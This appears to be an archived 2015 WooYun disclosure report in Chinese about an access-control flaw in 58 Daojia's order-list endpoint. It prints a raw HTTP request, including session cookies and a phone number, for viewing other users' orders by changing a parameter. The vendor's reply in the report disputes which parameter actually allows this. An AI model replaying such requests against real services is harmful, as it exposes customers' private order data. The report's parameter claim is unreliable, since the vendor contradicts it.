当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144919

漏洞标题:58到家某处设计缺陷

相关厂商:58同城

漏洞作者: 沦沦

提交时间:2015-10-08 11:37

修复时间:2015-11-22 13:08

公开时间:2015-11-22 13:08

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-08: 细节已通知厂商并且等待厂商处理中
2015-10-08: 厂商已经确认,细节仅向厂商公开
2015-10-18: 细节向核心白帽子及相关领域专家公开
2015-10-28: 细节向普通白帽子公开
2015-11-07: 细节向实习白帽子公开
2015-11-22: 细节向公众公开

简要描述:

RT

详细说明:

URL:http://t.jzt.58.com/orderInfo/orderList?orderType=3276&comm_pf=&channel=wx
orderType可平行越权查看他人订单,这次的越权是可以查看你生成定单号地方id的用户,要查看其它地方的用户定单,可重新生成一个其它地方的地址,然后进行遍一次就OK

1.png


生成自己的订单之后,把orderType参数的id改为他人的ID就可越权查看

GET /orderInfo/orderList?orderType=3276&comm_pf=&channel=wx HTTP/1.1
Host: t.jzt.58.com
User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: id58=05dz8VYSAd6KXQTqo4BoAg==; comm_cityid=147; comm_cityname=%u5927%u8FDE; thirdcallbak=http%3A//m.daojia.com/api/orderNotity; bi_hmsr=daojia_m_showye_baojie1_icon; bi_hmmd=none; bi_hmpl=none; bi_hmkw=none; bi_cookieid=14440367160025062461968; referurl=http%3A//t.jzt.58.com/yuzhifu/yzfindex%3Fcateid%3D1%26orderid%3D909864454397504; contantphone=13060980652; uid=2CC5684E1EF6A6C39248214BE10860C258C83264C5772CF3EE5F6BDEE81EE22F; phone=13060980652
X-Forwarded-For: 8.8.8.8
Connection: keep-alive


2.png


3.png

漏洞证明:

URL:http://t.jzt.58.com/orderInfo/orderList?orderType=3276&comm_pf=&channel=wx
orderType可平行越权查看他人订单,这次的越权是可以查看你生成定单号地方id的用户,要查看其它地方的用户定单,可重新生成一个其它地方的地址,然后进行遍一次就OK

1.png


生成自己的订单之后,把orderType参数的id改为他人的ID就可越权查看

GET /orderInfo/orderList?orderType=3276&comm_pf=&channel=wx HTTP/1.1
Host: t.jzt.58.com
User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: id58=05dz8VYSAd6KXQTqo4BoAg==; comm_cityid=147; comm_cityname=%u5927%u8FDE; thirdcallbak=http%3A//m.daojia.com/api/orderNotity; bi_hmsr=daojia_m_showye_baojie1_icon; bi_hmmd=none; bi_hmpl=none; bi_hmkw=none; bi_cookieid=14440367160025062461968; referurl=http%3A//t.jzt.58.com/yuzhifu/yzfindex%3Fcateid%3D1%26orderid%3D909864454397504; contantphone=13060980652; uid=2CC5684E1EF6A6C39248214BE10860C258C83264C5772CF3EE5F6BDEE81EE22F; phone=13060980652
X-Forwarded-For: 8.8.8.8
Connection: keep-alive


2.png


3.png

修复方案:

权限控制好

版权声明:转载请注明来源 沦沦@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-10-08 13:06

厂商回复:

已知的漏洞,后续更新版本的时候会统一修复。

最新状态:

2015-10-09:这个漏洞可能是小伙伴描述错误了,通过orderType这个的值是无法遍历获取其他用户订单信息的,看到的是自己订单的不同状态。不过通过另外的订单的id是可以遍历获取的,已经给开发反馈了。